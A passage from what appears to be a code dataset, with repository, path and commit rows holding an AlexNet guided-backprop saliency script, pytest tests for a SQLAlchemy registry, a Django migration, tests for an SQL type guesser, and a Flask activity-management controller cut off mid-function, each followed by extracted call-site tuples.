| [((12, 23, 12, 81), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((13, 23, 13, 85), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((14, 25, 14, 91), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((15, 28, 15, 104), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((16, 27, 16, 106), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((26, 14, 26, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((32, 14, 32, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((37, 14, 37, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((43, 14, 43, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((11, 80, 11, 103), 'os.path.expanduser', 'os.path.expanduser', ({(11, 99, 11, 102): '"""~"""'}, {}), "('~')", False, 'import os\n')] |
wezteoh/face_perception_thru_backprop | alexnet_guided_bp_vanilla.py | 449f78ce330876ff25fbcdf892023fd2ba86005c | import numpy as np
import tensorflow as tf
import os
from scipy.io import savemat
from scipy.io import loadmat
from scipy.misc import imread
from scipy.misc import imsave
from alexnet_face_classifier import *
import matplotlib.pyplot as plt
plt.switch_backend('agg')
class backprop_graph:
def __init__(self, num_classes, nhid, cnn):
self.num_classes = num_classes
self.inputs = tf.placeholder(tf.float32, shape = [None, 227, 227, 3], name='input')
self.labels_1hot = tf.placeholder(tf.float32, shape=[None, self.num_classes])
self.cnn = cnn(self.inputs, None, self.num_classes)
self.cnn.preprocess()
self.cnn.convlayers()
self.cnn.fc_layers(transfer_learning=False, nhid=nhid)
def classifier_graph(self, temp=3.0):
self.probabilities = tf.nn.softmax(self.cnn.fc2/temp)
self.probability = tf.tensordot(self.probabilities, self.labels_1hot, axes=[[1],[1]])
self.log_probability = tf.log(self.probability)
def guided_backprop_graph(self):
self.grad_fc2 = tf.nn.relu(tf.gradients(self.probability, self.cnn.fc2)[0])
self.grad_fc1 = tf.nn.relu(tf.gradients(self.cnn.fc2, self.cnn.fc1, grad_ys=self.grad_fc2)[0])
self.grad_conv5 = tf.nn.relu(tf.gradients(self.cnn.fc1, self.cnn.conv5, grad_ys=self.grad_fc1)[0])
self.grad_conv4 = tf.nn.relu(tf.gradients(self.cnn.conv5, self.cnn.conv4, grad_ys=self.grad_conv5)[0])
self.grad_conv3 = tf.nn.relu(tf.gradients(self.cnn.conv4, self.cnn.conv3, grad_ys=self.grad_conv4)[0])
self.grad_conv2 = tf.nn.relu(tf.gradients(self.cnn.conv3, self.cnn.conv2, grad_ys=self.grad_conv3)[0])
self.grad_conv1 = tf.nn.relu(tf.gradients(self.cnn.conv2, self.cnn.conv1, grad_ys=self.grad_conv2)[0])
self.grad_image = tf.nn.relu(tf.gradients(self.cnn.conv1, self.inputs, grad_ys=self.grad_conv1)[0])
###
def guided_backprop(graph, image, one_hot, sess):
image = np.expand_dims(image, 0)
one_hot = np.expand_dims(one_hot, 0)
saliency_map = sess.run(graph.grad_image, feed_dict={graph.inputs:image, graph.labels_1hot:one_hot})[0]
scaling_adjustment = 1E-20
saliency_map_scaled = saliency_map/(np.max(saliency_map)+scaling_adjustment)
return saliency_map_scaled
| [((12, 0, 12, 25), 'matplotlib.pyplot.switch_backend', 'plt.switch_backend', ({(12, 19, 12, 24): '"""agg"""'}, {}), "('agg')", True, 'import matplotlib.pyplot as plt\n'), ((44, 12, 44, 36), 'numpy.expand_dims', 'np.expand_dims', ({(44, 27, 44, 32): 'image', (44, 34, 44, 35): '0'}, {}), '(image, 0)', True, 'import numpy as np\n'), ((45, 14, 45, 40), 'numpy.expand_dims', 'np.expand_dims', ({(45, 29, 45, 36): 'one_hot', (45, 38, 45, 39): '0'}, {}), '(one_hot, 0)', True, 'import numpy as np\n'), ((18, 22, 18, 91), 'tensorflow.placeholder', 'tf.placeholder', (), '', True, 'import tensorflow as tf\n'), ((19, 27, 19, 85), 'tensorflow.placeholder', 'tf.placeholder', (), '', True, 'import tensorflow as tf\n'), ((26, 29, 26, 61), 'tensorflow.nn.softmax', 'tf.nn.softmax', ({(26, 43, 26, 60): 'self.cnn.fc2 / temp'}, {}), '(self.cnn.fc2 / temp)', True, 'import tensorflow as tf\n'), ((27, 27, 27, 93), 'tensorflow.tensordot', 'tf.tensordot', (), '', True, 'import tensorflow as tf\n'), ((28, 31, 28, 55), 'tensorflow.log', 'tf.log', ({(28, 38, 28, 54): 'self.probability'}, {}), '(self.probability)', True, 'import tensorflow as tf\n'), ((48, 40, 48, 60), 'numpy.max', 'np.max', ({(48, 47, 48, 59): 'saliency_map'}, {}), '(saliency_map)', True, 'import numpy as np\n'), ((31, 35, 31, 79), 'tensorflow.gradients', 'tf.gradients', ({(31, 48, 31, 64): 'self.probability', (31, 66, 31, 78): 'self.cnn.fc2'}, {}), '(self.probability, self.cnn.fc2)', True, 'import tensorflow as tf\n'), ((32, 35, 32, 98), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((33, 37, 33, 102), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((34, 37, 34, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((35, 37, 35, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((36, 37, 36, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((37, 37, 37, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((38, 37, 38, 103), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n')] |
AferriDaniel/coaster | tests/test_sqlalchemy_registry.py | 3ffbc9d33c981284593445299aaee0c3cc0cdb0b | """Registry and RegistryMixin tests."""
from types import SimpleNamespace
import pytest
from coaster.db import db
from coaster.sqlalchemy import BaseMixin
from coaster.sqlalchemy.registry import Registry
# --- Fixtures -------------------------------------------------------------------------
@pytest.fixture()
def CallableRegistry(): # noqa: N802
"""Callable registry with a positional parameter."""
class CallableRegistry:
registry = Registry()
return CallableRegistry
@pytest.fixture()
def PropertyRegistry(): # noqa: N802
"""Registry with property and a positional parameter."""
class PropertyRegistry:
registry = Registry(property=True)
return PropertyRegistry
@pytest.fixture()
def CachedPropertyRegistry(): # noqa: N802
"""Registry with cached property and a positional parameter."""
class CachedPropertyRegistry:
registry = Registry(cached_property=True)
return CachedPropertyRegistry
@pytest.fixture()
def CallableParamRegistry(): # noqa: N802
"""Callable registry with a keyword parameter."""
class CallableParamRegistry:
registry = Registry('kwparam')
return CallableParamRegistry
@pytest.fixture()
def PropertyParamRegistry(): # noqa: N802
"""Registry with property and a keyword parameter."""
class PropertyParamRegistry:
registry = Registry('kwparam', property=True)
return PropertyParamRegistry
@pytest.fixture()
def CachedPropertyParamRegistry(): # noqa: N802
"""Registry with cached property and a keyword parameter."""
class CachedPropertyParamRegistry:
registry = Registry('kwparam', cached_property=True)
return CachedPropertyParamRegistry
@pytest.fixture()
def all_registry_hosts(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""All test registries as a list."""
return [
CallableRegistry,
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
]
@pytest.fixture(scope='module')
def registry_member():
"""Test registry member function."""
def member(pos=None, kwparam=None):
pass
return member
@pytest.fixture(scope='session')
def registrymixin_models():
"""Fixtures for RegistryMixin tests."""
# We have two sample models and two registered items to test that
# the registry is unique to each model and is not a global registry
# in the base RegistryMixin class.
# Sample model 1
class RegistryTest1(BaseMixin, db.Model):
"""Registry test model 1."""
__tablename__ = 'registry_test1'
# Sample model 2
class RegistryTest2(BaseMixin, db.Model):
"""Registry test model 2."""
__tablename__ = 'registry_test2'
# Sample registered item (form or view) 1
class RegisteredItem1:
"""Registered item 1."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 2
@RegistryTest2.views('test')
class RegisteredItem2:
"""Registered item 2."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 3
@RegistryTest1.features('is1')
@RegistryTest2.features()
def is1(obj):
"""Assert object is instance of RegistryTest1."""
return isinstance(obj, RegistryTest1)
RegistryTest1.views.test = RegisteredItem1
return SimpleNamespace(**locals())
# --- Tests ----------------------------------------------------------------------------
# --- Creating a registry
def test_registry_set_name():
"""Registry's __set_name__ gets called."""
# Registry has no name unless added to a class
assert Registry()._name is None
class RegistryUser:
reg1 = Registry()
reg2 = Registry()
assert RegistryUser.reg1._name == 'reg1'
assert RegistryUser.reg2._name == 'reg2'
def test_registry_reuse_error():
"""Registries cannot be reused under different names."""
# Registry raises TypeError from __set_name__, but Python recasts as RuntimeError
with pytest.raises(RuntimeError):
class RegistryUser:
a = b = Registry()
def test_registry_reuse_okay():
"""Registries be reused with the same name under different hosts."""
reusable = Registry()
assert reusable._name is None
class HostA:
registry = reusable
assert HostA.registry._name == 'registry'
class HostB:
registry = reusable
assert HostB.registry._name == 'registry'
assert HostA.registry is HostB.registry
assert HostA.registry is reusable
def test_registry_param_type():
"""Registry's param must be string or None."""
r = Registry()
assert r._param is None
r = Registry('')
assert r._param is None
r = Registry(1)
assert r._param == '1'
r = Registry('obj')
assert r._param == 'obj'
r = Registry(param='foo')
assert r._param == 'foo'
def test_registry_property_cached_property():
"""A registry can have property or cached_property set, but not both."""
r = Registry()
assert r._default_property is False
assert r._default_cached_property is False
r = Registry(property=True)
assert r._default_property is True
assert r._default_cached_property is False
r = Registry(cached_property=True)
assert r._default_property is False
assert r._default_cached_property is True
with pytest.raises(TypeError):
Registry(property=True, cached_property=True)
# --- Populating a registry
def test_add_to_registry(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added to registries and accessed as per registry settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member(1) == (1, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_property_cache_mismatch(
PropertyRegistry, CachedPropertyRegistry # noqa: N803
):
"""A registry's default setting must be explicitly turned off if conflicting."""
with pytest.raises(TypeError):
@PropertyRegistry.registry(cached_property=True)
def member1(pos=None, kwparam=None):
return (pos, kwparam)
with pytest.raises(TypeError):
@CachedPropertyRegistry.registry(property=True)
def member2(pos=None, kwparam=None):
return (pos, kwparam)
@PropertyRegistry.registry(cached_property=True, property=False)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
def test_add_to_registry_host(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a function, overriding default settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry(property=False)
@CachedPropertyRegistry.registry(cached_property=False)
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry(property=False)
@CachedPropertyParamRegistry.registry(cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member(2) == (property_host, 2)
assert cached_property_host.registry.member(3) == (cached_property_host, 3)
assert callable_param_host.registry.member(4) == (4, callable_param_host)
assert property_param_host.registry.member(5) == (5, property_param_host)
assert cached_property_param_host.registry.member(6) == (
6,
cached_property_param_host,
)
def test_add_to_registry_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_cached_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_custom_name(all_registry_hosts, registry_member):
"""Members can be added to a registry with a custom name."""
assert registry_member.__name__ == 'member'
for host in all_registry_hosts:
# Mock decorator call
host.registry('custom')(registry_member)
# This adds the member under the custom name
assert host.registry.custom is registry_member
# The default name of the function is not present...
with pytest.raises(AttributeError):
assert host.registry.member is registry_member
# ... but can be added
host.registry()(registry_member)
assert host.registry.member is registry_member
def test_add_to_registry_underscore(all_registry_hosts, registry_member):
"""Registry member names cannot start with an underscore."""
for host in all_registry_hosts:
with pytest.raises(ValueError):
host.registry('_new_member')(registry_member)
def test_add_to_registry_dupe(all_registry_hosts, registry_member):
"""Registry member names cannot be duplicates of an existing name."""
for host in all_registry_hosts:
host.registry()(registry_member)
with pytest.raises(ValueError):
host.registry()(registry_member)
host.registry('custom')(registry_member)
with pytest.raises(ValueError):
host.registry('custom')(registry_member)
def test_cached_properties_are_cached(
PropertyRegistry, # noqa: N803
CachedPropertyRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""Cached properties are truly cached."""
# Register registry member
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return [pos, kwparam] # Lists are different each call
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
# The properties and cached properties work
assert property_host.registry.member == [property_host, None]
assert cached_property_host.registry.member == [cached_property_host, None]
assert property_param_host.registry.member == [None, property_param_host]
assert cached_property_param_host.registry.member == [
None,
cached_property_param_host,
]
# The properties and cached properties return equal values on each access
assert property_host.registry.member == property_host.registry.member
assert cached_property_host.registry.member == cached_property_host.registry.member
assert property_param_host.registry.member == property_param_host.registry.member
assert (
cached_property_param_host.registry.member
== cached_property_param_host.registry.member
)
# Only the cached properties return the same value every time
assert property_host.registry.member is not property_host.registry.member
assert cached_property_host.registry.member is cached_property_host.registry.member
assert (
property_param_host.registry.member is not property_param_host.registry.member
)
assert (
cached_property_param_host.registry.member
is cached_property_param_host.registry.member
)
# TODO:
# test_registry_member_cannot_be_called_clear_cache
# test_multiple_positional_and_keyword_arguments
# test_registry_iter
# test_registry_members_must_be_callable
# test_add_by_directly_sticking_in
# test_instance_registry_is_cached
# test_clear_cache_for
# test_clear_cache
# test_registry_mixin_config
# test_registry_mixin_subclasses
# --- RegistryMixin tests --------------------------------------------------------------
def test_access_item_from_class(registrymixin_models):
"""Registered items are available from the model class."""
assert (
registrymixin_models.RegistryTest1.views.test
is registrymixin_models.RegisteredItem1
)
assert (
registrymixin_models.RegistryTest2.views.test
is registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest1.views.test
is not registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest2.views.test
is not registrymixin_models.RegisteredItem1
)
assert registrymixin_models.RegistryTest1.features.is1 is registrymixin_models.is1
assert registrymixin_models.RegistryTest2.features.is1 is registrymixin_models.is1
def test_access_item_class_from_instance(registrymixin_models):
"""Registered items are available from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
# When accessed from the instance, we get a partial that resembles
# the wrapped item, but is not the item itself.
assert r1.views.test is not registrymixin_models.RegisteredItem1
assert r1.views.test.func is registrymixin_models.RegisteredItem1
assert r2.views.test is not registrymixin_models.RegisteredItem2
assert r2.views.test.func is registrymixin_models.RegisteredItem2
assert r1.features.is1 is not registrymixin_models.is1
assert r1.features.is1.func is registrymixin_models.is1
assert r2.features.is1 is not registrymixin_models.is1
assert r2.features.is1.func is registrymixin_models.is1
def test_access_item_instance_from_instance(registrymixin_models):
"""Registered items can be instantiated from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
i1 = r1.views.test()
i2 = r2.views.test()
assert isinstance(i1, registrymixin_models.RegisteredItem1)
assert isinstance(i2, registrymixin_models.RegisteredItem2)
assert not isinstance(i1, registrymixin_models.RegisteredItem2)
assert not isinstance(i2, registrymixin_models.RegisteredItem1)
assert i1.obj is r1
assert i2.obj is r2
assert i1.obj is not r2
assert i2.obj is not r1
def test_features(registrymixin_models):
"""The features registry can be used for feature tests."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
assert r1.features.is1() is True
assert r2.features.is1() is False
| [((14, 1, 14, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((24, 1, 24, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((34, 1, 34, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((44, 1, 44, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((54, 1, 54, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((64, 1, 64, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((74, 1, 74, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((94, 1, 94, 31), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((104, 1, 104, 32), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((181, 15, 181, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((200, 8, 200, 18), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((202, 8, 202, 20), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(202, 17, 202, 19): '""""""'}, {}), "('')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((204, 8, 204, 19), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(204, 17, 204, 18): '1'}, {}), '(1)', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((206, 8, 206, 23), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(206, 17, 206, 22): '"""obj"""'}, {}), "('obj')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((208, 8, 208, 29), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((214, 8, 214, 18), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((218, 8, 218, 31), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((222, 8, 222, 38), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((19, 19, 19, 29), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((29, 19, 29, 42), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((39, 19, 39, 49), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((49, 19, 49, 38), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(49, 28, 49, 37): '"""kwparam"""'}, {}), "('kwparam')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((59, 19, 59, 53), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((69, 19, 69, 60), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((163, 15, 163, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((164, 15, 164, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((173, 9, 173, 36), 'pytest.raises', 'pytest.raises', ({(173, 23, 173, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((226, 9, 226, 33), 'pytest.raises', 'pytest.raises', ({(226, 23, 226, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((227, 8, 227, 53), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((274, 9, 274, 33), 'pytest.raises', 'pytest.raises', ({(274, 23, 274, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((280, 9, 280, 33), 'pytest.raises', 'pytest.raises', ({(280, 23, 280, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((160, 11, 160, 21), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((176, 20, 176, 30), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((412, 13, 412, 42), 'pytest.raises', 'pytest.raises', ({(412, 27, 412, 41): 'AttributeError'}, {}), '(AttributeError)', False, 'import pytest\n'), ((422, 13, 422, 38), 'pytest.raises', 'pytest.raises', ({(422, 27, 422, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((430, 13, 430, 38), 'pytest.raises', 'pytest.raises', ({(430, 27, 430, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((434, 13, 434, 38), 'pytest.raises', 'pytest.raises', ({(434, 27, 434, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n')] |
RomanMahar/personalsite | home/migrations/0010_auto_20180206_1625.py | ad0c7880e0ccfe81ea53b8bad8e0d4fcf0c5830b | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-02-06 16:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('home', '0009_remove_homepagesection_sectiontitle'),
]
operations = [
migrations.CreateModel(
name='SnippetClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=255)),
('page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='snippy', to='wagtailcore.Page')),
],
),
migrations.AlterField(
model_name='homepagesection',
name='sectionClassName',
field=models.SlugField(default='homepage-section', help_text='no spaces', max_length=100),
),
migrations.AddField(
model_name='homepagesection',
name='advert',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='home.SnippetClass'),
),
]
| [((28, 18, 28, 101), 'django.db.models.SlugField', 'models.SlugField', (), '', False, 'from django.db import migrations, models\n'), ((33, 18, 33, 146), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((20, 23, 20, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((21, 25, 21, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((22, 25, 22, 156), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')] |
anniyanvr/nesta | nesta/packages/misc_utils/tests/test_guess_sql_type.py | 4b3ae79922cebde0ad33e08ac4c40b9a10e8e7c3 | import pytest
from nesta.packages.misc_utils.guess_sql_type import guess_sql_type
@pytest.fixture
def int_data():
return [1,2,4,False]
@pytest.fixture
def text_data():
return ['a', True, 2,
('A very long sentence A very long sentence A '
'very long sentence A very long sentence'), 'd']
@pytest.fixture
def float_data():
return [1,2.3,True,None]
@pytest.fixture
def bool_data():
return [True,False,None]
def test_guess_sql_type_int(int_data):
assert guess_sql_type(int_data) == 'INTEGER'
def test_guess_sql_type_float(float_data):
assert guess_sql_type(float_data) == 'FLOAT'
def test_guess_sql_type_bool(bool_data):
assert guess_sql_type(bool_data) == 'BOOLEAN'
def test_guess_sql_type_str(text_data):
assert guess_sql_type(text_data, text_len=10) == 'TEXT'
assert guess_sql_type(text_data, text_len=100).startswith('VARCHAR(')
| [((24, 11, 24, 35), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(24, 26, 24, 34): 'int_data'}, {}), '(int_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((27, 11, 27, 37), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(27, 26, 27, 36): 'float_data'}, {}), '(float_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((30, 11, 30, 36), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(30, 26, 30, 35): 'bool_data'}, {}), '(bool_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((33, 11, 33, 49), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', (), '', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((34, 11, 34, 50), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', (), '', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n')] |
DXCChina/pms | api/controller/activity.py | c779a69f25fb08101593c6ff0451debc0abce6e4 | # -*- coding: utf-8 -*-
'''活动管理接口'''
from flask import request
from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User
from model.role import identity
from flask_jwt_extended import (fresh_jwt_required)
def demand_activity_add(activity_id, data):
'''添加活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if not demand.activityId:
demand.activityId = activity_id
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_del(activity_id, data):
'''删除活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.activityId = None
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_done(activity_id, data):
'''更新活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.status = 1
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
@fresh_jwt_required
@identity.check_permission("create", 'task')
def activity_add():
'''创建项目活动'''
data = request.json
if 'memberId' in data and data['memberId']:
data['status'] = 'dev-ing'
with database.atomic():
activity_id = ActivityBase.create(**data).id
if 'memberId' in data and data['memberId']:
for member_id in data['memberId']:
role = ProjectMember.get(
ProjectMember.projectId == data['projectId'],
ProjectMember.memberId == member_id).role
ActivityMember.create(**{
'activityId': activity_id,
'memberId': member_id,
'role': role
})
demand_activity_add(activity_id, data['demand'])
return {"msg": 'ok'}
@fresh_jwt_required
@identity.check_permission("update", 'task')
def activity_update():
'''更新项目活动'''
data = request.json
activity_id = data.pop('activityId')
with database.atomic():
if 'del_memberId' in data:
for member_id in data.pop('del_memberId'):
ActivityMember.delete().where(
(ActivityMember.activityId == activity_id) &
(ActivityMember.memberId == member_id)).execute()
if 'memberId' in data:
